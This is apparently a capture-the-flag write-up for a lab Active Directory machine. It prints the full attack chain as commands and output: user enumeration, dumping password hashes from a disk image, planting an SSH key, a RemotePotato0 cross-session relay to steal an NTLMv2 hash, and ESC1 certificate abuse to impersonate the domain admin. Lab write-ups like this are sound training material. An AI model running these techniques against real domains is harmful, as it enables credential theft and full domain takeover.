Shibuya is a medium-difficulty Active Directory machine on VulnLab, created by xct. It involves user enumeration, SMB shares, cross-session relay attack, and ESC1

User

$ nxc smb 10.10.106.81 --generate-hosts-file hosts
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
$ cat hosts
10.10.106.81     AWSJPDC0522.shibuya.vl shibuya.vl AWSJPDC0522

Nmap

22/tcp   open  ssh
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
3389/tcp open  ms-wbt-server

From the Nmap scan, we can see that we’re dealing with a Domain Controller, as it has DNS and Kerberos services running. Additionally, SSH is open, which is unusual

SMB

We can try listing shares using null authentication and guest authentication, but in this case, both failed

$ nxc smb 10.10.106.81 -u '' -p '' --shares
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [+] shibuya.vl\:
SMB         10.10.106.81    445    AWSJPDC0522      [-] Error enumerating shares: STATUS_ACCESS_DENIED

1
2
3

$ nxc smb 10.10.106.81 -u 'a' -p '' --shares
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [-] shibuya.vl\a: STATUS_LOGON_FAILURE

We don’t have any valid credentials either, so let’s try to enumerate users using kerbrute with the xato-net-10-million-usernames wordlist

$ ~/tools/kerbrute userenum -d shibuya.vl --dc AWSJPDC0522.shibuya.vl /opt/seclists/Usernames/xato-net-10-million-usernames.txt -o users.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 04/07/25 - Ronnie Flathers @ropnop

2025/04/07 19:34:31 >  Using KDC(s):
2025/04/07 19:34:31 >   AWSJPDC0522.shibuya.vl:88

2025/04/07 19:34:32 >  [+] VALID USERNAME:       purple@shibuya.vl
2025/04/07 19:34:34 >  [+] VALID USERNAME:       red@shibuya.vl

In this case, we got two users: purple and red (this is a Jujutsu Kaisen reference, just like the name of the machine)
We don’t have a password yet, but we can try using the username as the password, sometimes this works

1
2
3

$ nxc smb shibuya.vl -u red -p red
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [-] shibuya.vl\red:red STATUS_LOGON_FAILURE

Using NTLM authentication doesn’t work; however, when we add -k to authenticate using Kerberos, it works

1
2
3

$ nxc smb shibuya.vl -u red -p red -k
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red

Awesome! Now that we have valid credentials, we can enumerate further. Running --shares to look for SMB shares, we notice two non-standard shares called users and images$, but we only have read access to the users share

$ nxc smb shibuya.vl -u red -p red -k --shares
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
SMB         shibuya.vl      445    AWSJPDC0522      [*] Enumerated shares
SMB         shibuya.vl      445    AWSJPDC0522      Share           Permissions     Remark
SMB         shibuya.vl      445    AWSJPDC0522      -----           -----------     ------
SMB         shibuya.vl      445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         shibuya.vl      445    AWSJPDC0522      C$                              Default share
SMB         shibuya.vl      445    AWSJPDC0522      images$
SMB         shibuya.vl      445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         shibuya.vl      445    AWSJPDC0522      NETLOGON        READ            Logon server share
SMB         shibuya.vl      445    AWSJPDC0522      SYSVOL          READ            Logon server share
SMB         shibuya.vl      445    AWSJPDC0522      users           READ

Let’s get a ticket and connect to the users share using smbclient from impacket

$ getTGT.py shibuya.vl/red:red
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

[*] Saving ticket in red.ccache
$ export KRB5CCNAME=red.ccache

$ smbclient.py -k -no-pass awsjpdc0522.shibuya.vl
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# shares
ADMIN$
C$
images$
IPC$
NETLOGON
SYSVOL
users
# use users
# ls
drw-rw-rw-          0  Sun Feb 16 11:50:59 2025 .
drw-rw-rw-          0  Wed Feb 19 13:59:37 2025 ..
drw-rw-rw-          0  Sat Feb 15 07:49:31 2025 Administrator
drw-rw-rw-          0  Sat Feb 15 16:48:20 2025 All Users
drw-rw-rw-          0  Sat Feb 15 16:49:12 2025 Default
drw-rw-rw-          0  Sat Feb 15 16:48:20 2025 Default User
-rw-rw-rw-        174  Sat Feb 15 16:46:52 2025 desktop.ini
drw-rw-rw-          0  Tue Feb 18 20:29:42 2025 nigel.mills
drw-rw-rw-          0  Sat Feb 15 07:49:31 2025 Public
drw-rw-rw-          0  Tue Feb 18 20:36:45 2025 simon.watson

As you can see, we have more users that we can add to our users file. We can also try accessing each folder, but in this case, we get a permission denied

# cd simon.watson
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# cd nigel.mills
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Let’s also enumerate more domain users using the --users flag in NetExec

$ nxc smb shibuya.vl -u red -p red -k --users
SMB         shibuya.vl      445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         shibuya.vl      445    AWSJPDC0522      [+] shibuya.vl\red:red
SMB         shibuya.vl      445    AWSJPDC0522      -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         shibuya.vl      445    AWSJPDC0522      _admin                        2025-02-15 07:55:29 0       Built-in account for administering the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         shibuya.vl      445    AWSJPDC0522      krbtgt                        2025-02-15 07:24:57 0       Key Distribution Center Service Account
SMB         shibuya.vl      445    AWSJPDC0522      svc_autojoin                  2025-02-15 07:51:49 0       <REDACTED>
SMB         shibuya.vl      445    AWSJPDC0522      Leon.Warren                   2025-02-16 10:23:34 0
SMB         shibuya.vl      445    AWSJPDC0522      Graeme.Kerr                   2025-02-16 10:23:34 0
SMB         shibuya.vl      445    AWSJPDC0522      Joshua.North                  2025-02-16 10:23:34 0
SMB         shibuya.vl      445    AWSJPDC0522      Shaun.Burton                  2025-02-16 10:23:34 0
...

In this case, we get a lot of users, but one of them stands out, svc_autojoin has what looks like a password in his description

1
2
3

$ nxc smb shibuya.vl -u svc_autojoin -p 'K5&A6Dw9d8jrKWhV'
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [+] shibuya.vl\svc_autojoin:<REDACTED>

We can check if this user can access the images$ share we saw earlier, and indeed, he can

$ nxc smb shibuya.vl -u svc_autojoin -p 'K5&A6Dw9d8jrKWhV' --shares
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [+] shibuya.vl\svc_autojoin:<REDACTED>
SMB         10.10.106.81    445    AWSJPDC0522      [*] Enumerated shares
SMB         10.10.106.81    445    AWSJPDC0522      Share           Permissions     Remark
SMB         10.10.106.81    445    AWSJPDC0522      -----           -----------     ------
SMB         10.10.106.81    445    AWSJPDC0522      ADMIN$                          Remote Admin
SMB         10.10.106.81    445    AWSJPDC0522      C$                              Default share
SMB         10.10.106.81    445    AWSJPDC0522      images$         READ
SMB         10.10.106.81    445    AWSJPDC0522      IPC$            READ            Remote IPC
SMB         10.10.106.81    445    AWSJPDC0522      NETLOGON        READ            Logon server share
SMB         10.10.106.81    445    AWSJPDC0522      SYSVOL          READ            Logon server share
SMB         10.10.106.81    445    AWSJPDC0522      users           READ

After connecting and listing the files, we see some .wim files, which stand for Windows Imaging Format. It’s a disk image file format that contains a snapshot of a Windows installation

$ smbclient.py svc_autojoin@shibuya.vl
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use images$
# ls
drw-rw-rw-          0  Wed Feb 19 18:35:20 2025 .
drw-rw-rw-          0  Wed Feb 19 13:59:37 2025 ..
-rw-rw-rw-    8264070  Wed Feb 19 18:35:20 2025 AWSJPWK0222-01.wim
-rw-rw-rw-   50660968  Wed Feb 19 18:35:20 2025 AWSJPWK0222-02.wim
-rw-rw-rw-   32065850  Wed Feb 19 18:35:20 2025 AWSJPWK0222-03.wim
-rw-rw-rw-     365686  Wed Feb 19 18:35:20 2025 vss-meta.cab

Let’s download them to our local machine and take a look

# get AWSJPWK0222-01.wim
# get AWSJPWK0222-02.wim
# get AWSJPWK0222-03.wim
# get vss-meta.cab

$ file *.wim
AWSJPWK0222-01.wim: Windows imaging (WIM) image v1.13, XPRESS compressed, reparse point fixup
AWSJPWK0222-02.wim: Windows imaging (WIM) image v1.13, XPRESS compressed, reparse point fixup
AWSJPWK0222-03.wim: Windows imaging (WIM) image v1.13, XPRESS compressed, reparse point fixup

We can mount those files, but a simpler way is to run 7z on them to extract the contents

1
2
3

$ 7z x AWSJPWK0222-01.wim
$ ls
 Administrator  'All Users'   Default  'Default User'   desktop.ini   Public   simon.watson

We have the home directories of Administrator and simon.watson, but there’s nothing interesting there. Let’s move on to the second WIM file and repeat the same process we used on the first one.

1 2	$ ls SAM SYSTEM SECURITY SAM SECURITY SYSTEM

Nice! There are the SAM, SYSTEM, and SECURITY hives. Let’s dump them using secretsdump from impacket

$ secretsdump.py -system SYSTEM -sam SAM -security SECURITY local
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x2e971736685fc53bfd5106d471e2f00f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8dcb5ed323d1d09b9653452027e8c013:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9dc1b36c1e31da7926d77ba67c654ae6:::
operator:1000:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::
[*] Dumping cached domain logon information (domain/username:hash)
SHIBUYA.VL/Simon.Watson:$DCC2$10240#Simon.Watson#04b20c71b23baf7a3025f40b3409e325: (2025-02-16 11:17:56+00:00)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:2f006b004e0045004c0045003f0051005800290040004400580060005300520079002600610027002f005c002e002e0053006d0037002200540079005e0044003e004e0056005f00610063003d00270051002e00780075005b0075005c00410056006e004200230066004a0029006f007a002a005700260031005900450064003400240035004b0079004d006f004f002100750035005e0043004e002500430050006e003a00570068005e004e002a0076002a0043005a006c003d00640049002e006d005a002d002d006e0056002000270065007100330062002f00520026006b00690078005b003600670074003900
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:1fe837c138d1089c9a0763239cd3cb42
[*] DPAPI_SYSTEM
dpapi_machinekey:0xb31a4d81f2df440f806871a8b5f53a15de12acc1
dpapi_userkey:0xe14c10978f8ee226cbdbcbee9eac18a28b006d06
[*] NL$KM
 0000   92 B9 89 EF 84 2F D6 55  73 67 31 8F E0 02 02 66   ...../.Usg1....f
 0010   F9 81 42 68 8C 3B DF 5D  0A E5 BA F2 4A 2C 43 0E   ..Bh.;.]....J,C.
 0020   1C C5 4F 40 1E F5 98 38  2F A4 17 F3 E9 D9 23 E3   ..O@...8/.....#.
 0030   D1 49 FE 06 B3 2C A1 1A  CB 88 E4 1D 79 9D AE 97   .I...,......y...
NL$KM:92b989ef842fd6557367318fe0020266f98142688c3bdf5d0ae5baf24a2c430e1cc54f401ef598382fa417f3e9d923e3d149fe06b32ca11acb88e41d799dae97
[*] Cleaning up...

Awesome, we got some hashes. You’d think it’s the Administrator’s hash, but it’s not. We can try spraying the Administrator and Operator user hashes with the list of users we got earlier, but in this case, it’s reasonable to guess that the Operator hash belongs to the simon.watson user, since he’s the one present on the machine, as we saw from the first WIM file we extracted

1
2
3

$ nxc smb shibuya.vl -u simon.watson -H <REDACTED>
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [+] shibuya.vl\simon.watson:<REDACTED>

Remember earlier, we couldn’t cd into Simon’s folder. Now that we have his credentials, we can connect to the users’ share and list his home directory

$ smbclient.py simon.watson@shibuya.vl -hashes :5d8c3d1a20bd63f60f469f6763ca0d50
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use users
# cd simon.watson
# ls
drw-rw-rw-          0  Tue Feb 18 20:36:45 2025 .
drw-rw-rw-          0  Sun Feb 16 11:50:59 2025 ..
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 AppData
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Application Data
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Cookies
drw-rw-rw-          0  Sun Feb 16 11:42:41 2025 Desktop
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Documents
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Downloads
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Favorites
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Links
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Local Settings
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Music
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 My Documents
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 NetHood
-rw-rw-rw-     262144  Sun Feb 16 11:42:05 2025 NTUSER.DAT
-rw-rw-rw-     106496  Sun Feb 16 11:42:05 2025 ntuser.dat.LOG1
-rw-rw-rw-          0  Sun Feb 16 11:42:05 2025 ntuser.dat.LOG2
-rw-rw-rw-      65536  Sun Feb 16 11:42:08 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TM.blf
-rw-rw-rw-     524288  Sun Feb 16 11:42:05 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000001.regtrans-ms
-rw-rw-rw-     524288  Sun Feb 16 11:42:05 2025 NTUSER.DAT{c76cbcdb-afc9-11eb-8234-000d3aa6d50e}.TMContainer00000000000000000002.regtrans-ms
-rw-rw-rw-         20  Tue Feb 18 20:30:58 2025 ntuser.ini
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Pictures
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 PrintHood
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Recent
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Saved Games
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 SendTo
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Start Menu
drw-rw-rw-          0  Sun Feb 16 11:42:06 2025 Templates
drw-rw-rw-          0  Sun Feb 16 11:42:05 2025 Videos

We can get the user flag from the desktop

# cd desktop
# ls
drw-rw-rw-          0  Sun Feb 16 11:42:41 2025 .
drw-rw-rw-          0  Tue Feb 18 20:36:45 2025 ..
-rw-rw-rw-         36  Sun Feb 16 11:43:08 2025 flag.txt
# get flag.txt

Now we need a way to get a shell on the box. Remember from the Nmap scan that SSH is open. Let’s create a .ssh folder inside the user’s home directory and place our key there

$ ssh-keygen -t ed25519 -f simon
$ mv simon.pub authorized_keys

# mkdir .ssh
# cd .ssh
# put authorized_keys

And we’re in!

$ ssh -i simon simon.watson@shibuya.vl
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

Another way we can connect to SSH is by using changepasswd from Impacket to change Simon’s password using his hash, since we can’t use pass-the-hash with SSH

$ changepasswd.py shibuya.vl/simon.watson@shibuya.vl -hashes :<REDACTED> -newpass P@ssw0rd
Impacket v0.13.0.dev0+20250404.133223.00ced47f - Copyright Fortra, LLC and its affiliated companies

[*] Changing the password of shibuya.vl\simon.watson
[*] Connecting to DCE/RPC as shibuya.vl\simon.watson
[*] Password was changed successfully.

$ ssh simon.watson@shibuya.vl
simon.watson@shibuya.vl's password:
Microsoft Windows [Version 10.0.20348.3207]
(c) Microsoft Corporation. All rights reserved.

shibuya\simon.watson@AWSJPDC0522 C:\Users\simon.watson>

ROOT

Since LDAP is closed, we weren’t able to gather BloodHound data earlier. But now that we have an SSH connection, we can open a SOCKS proxy and use it to collect BloodHound data remotely with NetExec

$ ssh -i simon simon.watson@shibuya.vl -D1080 -N
$ proxychains4 -q nxc ldap shibuya.vl -u simon.watson -p P@ssw0rd --bloodhound --dns-server 10.10.106.81 --dns-tcp -c All
LDAP        10.10.106.81    389    AWSJPDC0522      [*] Windows Server 2022 Build 20348 (name:AWSJPDC0522) (domain:shibuya.vl)
LDAP        10.10.106.81    389    AWSJPDC0522      [+] shibuya.vl\simon.watson:P@ssw0rd
LDAP        10.10.106.81    389    AWSJPDC0522      Resolved collection methods: group, localadmin, session, dcom, rdp, trusts, objectprops, acl, container, psremote
LDAP        10.10.106.81    389    AWSJPDC0522      Done in 00M 25S
LDAP        10.10.106.81    389    AWSJPDC0522      Compressing output into /home/serio/.nxc/logs/AWSJPDC0522_10.10.106.81_2025-04-07_203219_bloodhound.zip

The next step is tricky to find. If we run ps to list running processes, we can see that Explorer is running, so it looks like someone is logged in

PS C:\Users\simon.watson> ps

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    210       8     7152      12052              3272   0 AggregatorHost
    395      33    12776      21552              2436   0 certsrv
     85       6     2404       4740       0.02   6124   0 cmd
    101       7     1144       5444       0.11   3560   0 conhost
    345      17     1988       6328               452   0 csrss
    252      14     1924       6464               528   1 csrss
    174      11     1768       5988              5388   2 csrss
    371      15     3304      15316               636   1 ctfmon
    419      34    16696      25540              2680   0 dfsrs
    156       9     1944       6296              2560   0 dfssvc
   5394    4799    69064      70932              2512   0 dns
    716      31    13808      47572              1344   1 dwm
    625      26    15000      39984              5668   2 dwm
   1515      58    22980     152320              2920   1 explorer
...

We can try to list more information about the session using the qwinsta command, but in this case, it failed

1 2	PS C:\Users\simon.watson> qwinsta * No session exists for *

Somehow, if we run it with runas it works, as shown here

sliver (shibuya) > execute-assembly '/home/serio/vulnlab/shibuya/RunasCs.exe' x x qwinsta -l 9

[*] Output:

 SESSIONNAME       USERNAME                 ID  STATE   TYPE        DEVICE
>services                                    0  Disc
 rdp-tcp#0         nigel.mills               1  Active
 console                                     2  Conn
 31c5ce94259d4...                        65536  Listen
 rdp-tcp                                 65537  Listen

As you can see, the user nigel.mills has a session with an ID of 1. Another way to enumerate this is by checking the “Sessions” option in BloodHound, it should show that the user nigel has a session on the DC

Cross Session Relay

With this information in hand, we can perform a cross-session relay attack (that’s why the machine is called Shibuya) and capture Nigel’s hash. You can refer to 0xdf’s write-up on Rebound here.
To carry out the attack we need to download the RemotePotato0 binary and upload it to the target machine. The attack can also be performed using KrbRelay, but I prefer the first option
First, we run socat like this

1	$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.106.81:8888

Then, we execute RemotePotato0 on the target machine

PS C:\ProgramData> .\RemotePotato0.exe -m 2 -r 10.8.0.210 -x 10.8.0.210 -p 8888 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on 10.8.0.210 to your victim machine on port 8888
[*] Example Network redirector:
        sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:8888
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] RPC relay server listening on port 9997 ...
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] Starting RogueOxidResolver RPC Server listening on port 8888 ...
[*] IStoragetrigger written: 102 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 8888
[+] User hash stolen!

NTLMv2 Client   : AWSJPDC0522
NTLMv2 Username : SHIBUYA\Nigel.Mills
NTLMv2 Hash     : Nigel.Mills::SHIBUYA:<REDACTED>

And as you can see, we’ve captured nigel’s hash. Let’s save it to a file and crack it with john

$ j nigel.hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
<REDACTED>       (Nigel.Mills)
1g 0:00:00:00 DONE (2025-04-07 22:01) 10.00g/s 2273Kp/s 2273Kc/s 2273KC/s asswipe!..920217
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

ADCS

Let’s look for vulnerable templates using certipy

$ proxychains4 -q certipy find -u nigel.mills -p <REDACTED> -dc-ip 10.10.106.81 -dns-tcp -vulnerable -enabled -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA
[!] Got error while trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'shibuya-AWSJPDC0522-CA' via RRP
[*] Got CA configuration for 'shibuya-AWSJPDC0522-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : shibuya-AWSJPDC0522-CA
    DNS Name                            : AWSJPDC0522.shibuya.vl
    Certificate Subject                 : CN=shibuya-AWSJPDC0522-CA, DC=shibuya, DC=vl
    Certificate Serial Number           : 2417712CBD96C58449CFDA3BE3987F52
    Certificate Validity Start          : 2025-02-15 07:24:14+00:00
    Certificate Validity End            : 2125-02-15 07:34:13+00:00
    Web Enrollment                      : Enabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SHIBUYA.VL\Administrators
      Access Rights
        ManageCertificates              : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        ManageCa                        : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Enroll                          : SHIBUYA.VL\Authenticated Users
    [!] Vulnerabilities
      ESC8                              : Web Enrollment is enabled and Request Disposition is set to Issue
Certificate Templates
  0
    Template Name                       : ShibuyaWeb
    Display Name                        : ShibuyaWeb
    Certificate Authorities             : shibuya-AWSJPDC0522-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Any Purpose
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 100 years
    Renewal Period                      : 75 years
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SHIBUYA.VL\t1_admins
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SHIBUYA.VL\_admin
        Write Owner Principals          : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Dacl Principals           : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
        Write Property Principals       : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
                                          SHIBUYA.VL\_admin
    [!] Vulnerabilities
      ESC1                              : 'SHIBUYA.VL\\t1_admins' can enroll, enrollee supplies subject and template allows client authentication
      ESC2                              : 'SHIBUYA.VL\\t1_admins' can enroll and template can be used for any purpose
      ESC3                              : 'SHIBUYA.VL\\t1_admins' can enroll and template has Certificate Request Agent EKU set

Since nigel.mills is a member of the t1_admins group we can exploit this easily

$ proxychains4 -q nxc ldap 10.10.106.81 -u nigel.mills -p <REDACTED> -M groupmembership -o USER=nigel.mills
LDAP        10.10.106.81    389    AWSJPDC0522      [*] Windows Server 2022 Build 20348 (name:AWSJPDC0522) (domain:shibuya.vl)
LDAP        10.10.106.81    389    AWSJPDC0522      [+] shibuya.vl\nigel.mills:<REDACTED>
GROUPMEM... 10.10.106.81    389    AWSJPDC0522      [+] User: nigel.mills is member of following groups:
GROUPMEM... 10.10.106.81    389    AWSJPDC0522      shibuya
GROUPMEM... 10.10.106.81    389    AWSJPDC0522      t1_admins
GROUPMEM... 10.10.106.81    389    AWSJPDC0522      Domain Users

ESC1

Here we use the _admin upn because he’s the domain admin

$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -dc-ip 10.10.106.81 -target shibuya.vl -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with UPN '_admin'
[*] Certificate has no object SID
[*] Saved certificate and private key to '_admin.pfx'

Nice! we got the pfx, now we can use it to get his hash

$ certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.10.106.81
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user '_admin'

But we got an error saying [-] Object SID mismatch between certificate and user '_admin'. This is intended actually, earlier this February, Microsoft started enforcing the SID: https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16

By February 2025, if the StrongCertificateBindingEnforcement registry key is not configured, domain controllers will move to Full Enforcement mode

However, we can just set the SID in the request

$ proxychains4 -q certipy req -u Nigel.Mills -p <REDACTED> -dc-ip 10.10.106.81 -target shibuya.vl -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -sid S-1-5-21-87560095-894484815-3652015022-500 -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN '_admin'
[*] Certificate object SID is 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Saved certificate and private key to '_admin.pfx'

$ certipy auth -pfx _admin.pfx -domain shibuya.vl -username _admin -dc-ip 10.10.106.81
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: _admin@shibuya.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[*] Got hash for '_admin@shibuya.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>

With the DA hash in hand, we can perform a DCSync, but I’ll just read the flag via SMB

$ nxc smb 10.10.106.81 -u _admin -H <REDACTED> -x 'type C:\users\administrator\desktop\root.txt'
SMB         10.10.106.81    445    AWSJPDC0522      [*] Windows Server 2022 Build 20348 x64 (name:AWSJPDC0522) (domain:shibuya.vl) (signing:True) (SMBv1:False)
SMB         10.10.106.81    445    AWSJPDC0522      [+] shibuya.vl\_admin:<REDACTED> (Pwn3d!)
SMB         10.10.106.81    445    AWSJPDC0522      [+] Executed command via wmiexec
SMB         10.10.106.81    445    AWSJPDC0522      VL{REDACTED}

Beyond root

Pre-Created Computer Accounts

The red:red and purple:purple worked because both are precreated machine accounts. We can verify by running the pre2k module in NetExec

$ proxychains4 -q nxc ldap shibuya.vl -u red -p red -k -M pre2k
LDAP        shibuya.vl      389    AWSJPDC0522      [*] Windows Server 2022 Build 20348 (name:AWSJPDC0522) (domain:shibuya.vl)
LDAP        shibuya.vl      389    AWSJPDC0522      [+] shibuya.vl\red:red
